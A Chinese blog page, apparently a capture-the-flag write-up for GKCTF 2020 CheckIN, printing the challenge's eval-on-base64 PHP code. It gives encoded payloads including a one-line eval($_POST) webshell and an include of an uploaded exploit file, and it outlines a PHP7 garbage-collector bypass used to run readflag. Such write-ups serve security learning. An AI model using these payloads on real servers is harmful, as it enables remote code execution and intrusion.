当前位置: 首页 > news >正文

[GKCTF 2020]CheckIN

classClassName{public$code=null;public$decode=null;function__construct(){// 1. 从 $_REQUEST(GET/POST/Cookie)中获取「Ginkgo」参数的值$this->code=@$this->x()['Ginkgo'];// 2. 对 Ginkgo 的值做 base64 解码$this->decode=@base64_decode($this->code);// 3. 执行解码后的代码@Eval($this->decode);}publicfunctionx(){return$_REQUEST;}}newClassName();// 实例化类,自动触发 __construct 方法

就是执行用base64加密的$_REQUEST传入的参数Ginkgo
phpinfo();加密后为cGhwaW5mbygpOw==

/?Ginkgo=cGhwaW5mbygpOw==


没禁用eval等函数

传一句话木马连接上shell。
eval($_POST[pwd]);加密后为ZXZhbCgkX1BPU1RbcHdkXSk7

打开却显示flag为空。
发现readflag文件,应该是运行这个文件来读flag。

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

php7-gc-bypass漏洞源于 PHP 垃圾回收(GC)机制中的堆溢出,PHP 的 GC 在处理循环引用的变量时,会对内存块进行标记和回收。漏洞存在于内存块的大小计算逻辑中,恶意构造的循环引用变量会触发堆溢出,覆盖相邻内存数据。因此利用堆溢出可篡改函数指针,最终执行任意系统命令。

网上有EXP ( Exploit ),修改一下执行对象为readflag。
修改后上传文件至tmp目录下。

include('/tmp/exploit.php');加密后为aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

http://www.cnnetsun.cn/news/114052.html

相关文章:

  • Slimjet浏览器:基于Chromium的高效网页浏览解决方案,内置广告拦截与多功能工具
  • AMP页面还要做吗?2025替代方案及优化指南
  • 为什么你的RAG总是“一本正经地胡说八道”?EAG-RAG揭示真相,准确率暴涨300%的秘密!
  • iOS 项目中证书管理常见的协作问题
  • 理解线程不安全:从观察到原因分析
  • 《Java Web开发入门很简单》——学习笔记,新手入门,收藏这篇就够了
  • 2025年,国内外最火的10款降AI率工具亲测!(持续更新)
  • 基于大数据的餐饮食材管理系统的设计与实现开题报告
  • 基于大数据的交通信号智能控制系统的设计与实现开题报告
  • 基于大数据的交通信号智能控制系统的设计与实现任务书
  • 蜘蛛池站点优化思路分享
  • 2025 OA 选型关键看这 4 点:集成、灵活、安全、易用,附高性价比系统清单
  • 图神经网络与pytorch
  • Xiaomi 商城页面布局(部分)
  • FPGA以太网升级程序:便捷qspi Flash升级,具备校验功能,适用于Xilinx 7系列...
  • 运料小车装卸料控制:西门子1200PLC与TP700触摸屏联机仿真博途16
  • S32K311启动过程中,向量表重定向
  • 从蓝图到产线:高效产品信息传递的桥梁建设
  • 时间复杂度
  • 网站建设公司怎么选?2025年网站设计制作公司推荐指南
  • 今天咱们来聊一个挺有意思的优化算法改进——基于透镜成像反向策略的海洋捕食者算法。这个改进版本在原始MPA基础上搞了点新花样,咱们直接上干货看代码实现
  • Gitee:本土化DevOps平台如何重塑中国开发者生态
  • vCenter Server 8.0U3h 新增功能简介
  • Cisco NX-OS 10.6(2)F 发布 - 数据中心网络操作系统
  • Ubuntu24.04无操作卡死,无法唤醒问题以及内核版本切换记录
  • 全场景覆盖・全流程智控:分布式解决方案让多功能厅 “不止于多”
  • 【轨物方案】聚焦锯床设备智能化升级,打造工业互联网新范式
  • 【轨物交流】轨物科技亮相2025高校科技成果交易会
  • cesium加载geotiff的 四种方法
  • 【毕业设计】基于python的运维管理平台的设计与实现